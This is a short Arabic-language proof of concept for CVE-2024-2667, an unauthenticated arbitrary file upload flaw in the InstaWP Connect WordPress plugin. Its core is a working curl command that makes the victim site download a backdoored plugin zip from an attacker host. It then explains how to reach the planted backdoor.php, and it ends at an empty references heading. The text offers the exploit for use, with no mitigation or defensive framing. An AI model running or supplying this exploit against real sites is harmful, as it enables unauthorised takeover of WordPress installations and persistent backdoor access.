
هذا هو POC لثغرة CVE-2024-2667 (InstaWP Connect – إنشاء نسخة تجريبية وترحيل WP بنقرة واحدة <= 0.1.0.22 - رفع ملفات تعسفي بدون مصادقة)
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
api_key -> يمكنك استخدام أي مفتاح API صالح أو غير صالح.
override_plugin_zip -> المسار إلى ملف zip الذي يحتوي على إضافة ووردبريس خبيثة مع باب خلفي.
بمجرد الاستيراد، يمكنك الوصول إلى الباب الخلفي عبر http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php (بافتراض أن اسم المجلد هو malicious-plugin وأن backdoor.php موجود داخل هذا المجلد).
المراجع: